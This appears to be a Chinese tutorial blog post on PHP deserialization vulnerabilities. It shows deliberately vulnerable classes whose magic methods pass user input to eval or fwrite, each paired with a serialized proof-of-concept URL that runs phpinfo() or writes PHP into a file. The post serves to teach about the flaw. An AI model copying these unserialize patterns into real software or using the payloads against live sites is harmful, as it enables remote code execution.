C php反序列化,php反序列化漏洞 - anansec的個人空間 - OSCHINA - 中文開源技術交流社區...

反序列化本身是沒有漏洞的,但是當反序列化和一些魔術方法結合使用時就可能會產生安全風險。常用的魔術方法__wakeup

反序列化漏洞示例(__wekeup)

class A{var $test = "demo";function __wakeup(){eval($this->test);}}$b = new A();$c = serialize($b);$a = $_GET['test'];$a_unser = unserialize($a);#漏洞利用poc http://127.0.0.1:8999/test/unserialize1.php?test=O:1:"A":1:{s:4:"test";s:10:"phpinfo();";}

解釋:傳入的參數被反序列化,導致魔術方法__wakeup被自動調用,這時參數傳入的值將被作為eval的參數使用,所以這里會因反序列化導致任意代碼執行。

反序列化漏洞(__wakeup和文件操作)

require "test.php";//測試方便class A{var $test = '123';function __wakeup(){$fp = fopen("test.php", "w");fwrite($fp, $this->test);fclose($fp);}}$a = new A();print_r(serialize($a));$class1 = $_GET['test'];$class1_unser = unserialize($class1);利用poc:http://127.0.0.1:8999/test/unserialize1.php?test=O:1:"A":1:{s:4:"test";s:18:"<?php phpinfo();?>";}

解釋:和上面一一樣,當傳入的參數被反序列化時,魔術方法__wakeup被調用,傳入的參數會作為fwrite的第二個參數直接寫入test.php文件中,從而導致反序列化漏洞

反序列化漏洞示例(__construct)

require 'test.php';class b{function __construct($test){$fp = fopen("test.php", 'w');fwrite($fp, $test);fclose($fp);}}class a{var $test = 123;function __wakeup(){$obj = new b($this->test);}}$class = $_GET['test'];$class_u = unserialize($class);利用poc:http://127.0.0.1:8999/test/unserialize1.php?test=O:1:"A":1:{s:4:"test";s:18:"<?php phpinfo();?>";}

解釋:unserialize()會自動調用__wakeup(),__wakeup中實力化a,這時會調用構造函數__construct,因為構造函數被調用,所傳入的參數會作為fwrite的參數寫入shell.php文件,從而造成代碼執行

類的普通方法——反序列化問題

class maniac{public $test;function __construct(){$this->test = new x1();}function __destruct(){$this->test->action();}}class x1{function action(){echo "123";}}class x2{public $test2;function action(){eval($this->test2);}}$class2 = new maniac();unserialize($_GET['test']);漏洞利用poc:http://127.0.0.1:8999/test/unserialize1.php?test=O:6:"maniac":1:{s:4:"test";O:2:"x2":1:{s:5:"test2";s:10:"phpinfo();";}}

解釋:maniac實例化,構造方法(\_\_construct)被調用,x1被示例化;反序列執行,析構方法(\_\_destreuct)被調用;如果$\_GET沒有傳入合法的序列化字符串,就會自動調用x1的action方法,如果$\_GET接收到正確的序列化字符串,那么析構方法就會調用x2的action方法,從而這里就有可能導致任意命令執行

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/news/529663.shtml
繁體地址,請注明出處:http://hk.pswp.cn/news/529663.shtml
英文地址,請注明出處:http://en.pswp.cn/news/529663.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

oracle lob值是什么,關于Oracle數據庫LOB大字段總結

概述在ORACLE數據庫中&#xff0c;DBA_OBJECTS視圖中OBJECT_TYPE為LOB的對象是什么東西呢&#xff1f;其實OBJECT_TYPE為LOB就是大對象(LOB)&#xff0c;它指那些用來存儲大量數據的數據庫字段。Oracle 11gR2 文檔&#xff1a;http://download.oracle.com/docs/cd/E11882_01/Ap…

php 統計目錄大小,PHP 統計目錄大小

例01:function dirsize($dir){$size0;//打開目錄$ddopendir($dir); //--opendir("")打開一個目錄&#xff0c;返回此目錄的資源句柄readdir($dd); //--通過讀兩次&#xff0c;來跳過特殊目錄"."、".."readdir($dd);//遍歷目錄累加大小while($f …

oracle03206,ORACLE數據庫創建表空間ORA-03206報錯的解決方案

Oracle的數據文件大小是有限制的&#xff0c;今天在創建表空間的時候就遇到了問題&#xff0c;限制很簡單&#xff0c;作為DBA必須要了解。測試環境&#xff1a;操作系統&#xff1a;Win7 64位專業版數據庫版本&#xff1a;64位Oracle10.2.0.4DB_NAME&#xff1a;hoegh表空間名…

oracle sql server的區別,oracle與sqlserver的十大區別

http://blog.csdn.net/it_fengli/article/details/8213839 --sql server 與 oracle的區別&#xff1a; --DBMS 數據庫管理系統 --1.數據類型不同。 --sql server 的數據類型&#xff1a;int ,smallint ,char,varchar,nchar,nvarchar,ntext,datetime,smalldatetime,money,decima…

Oracle19C的dbhome,Windows server 安裝Oracle19c (WINDOWS.X64_193000_db_home.zip) 過程碰到的問題總結...

Oracle19c的下載地址&#xff1a;鏈接: https://pan.baidu.com/s/1snqyViOAoeffAztPes_Tvw提取碼: 9kb6Oracle19c的安裝過程&#xff1a;解壓縮安裝包&#xff1a;解壓結果 以管理員方式運行setup開始安裝 一直默認走到安裝完成即可創建用戶cmd執行sqlplus命令&#xff0c;輸入…

oracle01537,ORACLE REUSE實驗

一、查看數據文件位置SQL> show user;User is "SYS"SQL> desc dba_data_files;Name Type Nullable Default Comments--------------- ------------- -------- ------- ---------------------------------------------------FILE_NAME …

oracle數據庫配置管理,Oracle配置管理

一、連接Oracle1、Oracle建立連接的過程無論是通過sqlplus命令連接還是第三方工具遠程連接到Oracle&#xff0c;都需要建立客戶端與服務端之間的連接。Oracle Net Service組件就是為了用于建立連接的&#xff0c;這個組件在安裝Oracle時已經安裝。1)在服務器端有一個listener監…

oracle 插入一個語句,oracle如何通過1條語句插入多個值 oracle通過1條語句插入多個值方法...

本篇文章小編給大家分享一下oracle通過1條語句插入多個值方法&#xff0c;小編覺得挺不錯的&#xff0c;現在分享給大家供大家參考&#xff0c;有需要的小伙伴們可以來看看。在實踐過程中遇到一個問題&#xff0c;我想往數據庫插入多條數據時&#xff0c;使用了如下語句&#x…

linux內核 默認路由表,[Linux] linux路由表-Go語言中文社區

路由表用于決定數據包從哪個網口發出&#xff0c;其主要判斷依據是目標IP地址Linux路由表其實有2個主要概念&#xff1a;按順序走路由策略,在路由策略對應的路由表中匹配規則路由策略(rule)路由表(table)查看所有的路由策略,32766那個策略最有用,對應的main路由表也是默認展示的…

linux添加源地址ping,實戰經驗:Linux Source NAT在Ping場景下的應用

原標題&#xff1a;實戰經驗&#xff1a;Linux Source NAT在Ping場景下的應用有時候&#xff0c;有這樣的一種需求&#xff1a;需要修改IP數據包中的源地址&#xff0c;比如&#xff0c;從某一個主機發送Ping包到另一個主機&#xff0c;需要修改源地址為另一個源(通常&#xff…

mac遠程linux的ide,Jupyter notebook在mac:linux上的配置和遠程訪問

IPython 和 JupyterIPython 通常指的是一個 Python REPL(交互式解釋器) shell。提供了遠比 Python shell 強大的 shell 環境。IPython 是 Iteractive Python shell的縮寫。 Notebook 是一個基于 IPython 的 web 應用。截止 IPython 3.0 &#xff0c;IPython 變得越來越臃腫&…

Linux升級glibc版本漢字亂碼,Linux CentOS6升級glibc庫過程

CentOS6升級glibc庫過程hadoop無法加載native庫&#xff0c;可能原因是 glibc庫版本過低&#xff0c;需要升級。第一&#xff1a;安裝以下軟件yum -y install zlib zlib-devel gcc gcc-c libtool openssl openssl-devel automake autoconf libtool pcre*第二、查看系統glibc版本…

linux圖形界面 革命,Windows 95帶來的革命

CDECDE1993年6月-在“公用桌面環境“是與Sun&#xff0c;惠普&#xff0c;IBM和合資Unix系統實驗室。CDE&#xff0c;通用桌面環境(CommonDesktopEnvironment)的縮寫。CDE是一種運行于UNIX&#xff0c;基于Motif部件工具箱開發的商業桌面環境。惠普的OpenVMS采用CDE作為標準的桌…

real time linux pdf,【整理】ubuntu real time Linux

ubuntu real timeUbuntu不支持實時可參考看看如何才能支持想要自己編譯實時內核的話參考去&#xff1a;下載&#xff1a;The Real Time Preempt Patch然后自己編譯即可。對于實時系統所支持的功能和特性以及平臺&#xff0c;詳見這里提供了 已編譯好的實時的Debian相關內容或參…

arm64 linux 除零正常返回,arm64程序調用規則

前言這篇主要介紹arm64程序調用規則&#xff0c;詳細分析了程序調用過程中&#xff0c;參數是如何傳遞的。Android、iOS、Linux等基本遵循這些規則&#xff0c;但是各個操作系統平臺也有小部分自己特定的規則。下一篇&#xff0c;我將介紹iOS平臺的特定規則。術語介紹術語意義A…

蘋方字體 for linux,蘋果蘋方字體

蘋果蘋方字體是一款很實用的字體軟件&#xff0c;蘋果蘋方字體是為中國蘋果用戶打造的全新字體&#xff0c;共有六種字重&#xff0c;使用方便&#xff0c;能夠滿足用戶在閱讀時不同的字體需求&#xff0c;并且蘋果蘋方字體還可以在安卓、Linux 等其他平臺和設備上使用&#xf…

linux系統關機half,Linux 學習 (六) 關機與重啟命令

JavaScript基礎 DOM的操作1.DOM的基本概念 DOM是文檔對象模型,這種模型為樹模型:文檔是指標簽文檔:對象是指文檔中每個元素:模型是指抽象化的東西. 2.Windows對象操作 一.屬性和方法: window對象——瀏覽器 ...推薦《HeadFirst設計模式》相對于國內初版的,HeadFirst真的是更好的…

職坐標c語言,C/C++知識點之hexdump的C語言實現

本文主要向大家介紹了C/C知識點之hexdump的C語言實現&#xff0c;通過具體的內容向大家展示&#xff0c;希望對大家學習C/C知識點有所幫助。1 void hexdump(char *buf, int len)2 {3 int i 0;45 printf("\n----------------------hexdump-----------------------…

C語言編雜志程序,c語言程序錯誤修改

題目:雜志訂閱管理系統使用計算機對一種雜志的訂閱進行管理,該雜志最多訂戶不超過10人,每個訂戶的信息包括:姓名 性別 地址 電話號碼 雜志單價 訂閱數 訂閱期限(至**年**月)。現要求用菜單選擇并完成下述的功能&#xff1a;(1)增加新訂戶&#xff0c;既將訂戶的全部信息輸入到文…

c語言關鍵詞中英翻譯機編程,課程設計--C語言關鍵字中英翻譯機

《課程設計--C語言關鍵字中英翻譯機》由會員分享&#xff0c;可在線閱讀&#xff0c;更多相關《課程設計--C語言關鍵字中英翻譯機(21頁珍藏版)》請在人人文庫網上搜索。1、課課 程程 設設 計計 報報 告告 學院、系&#xff1a; 專業名稱&#xff1a; 課程設計科目 所在班級&…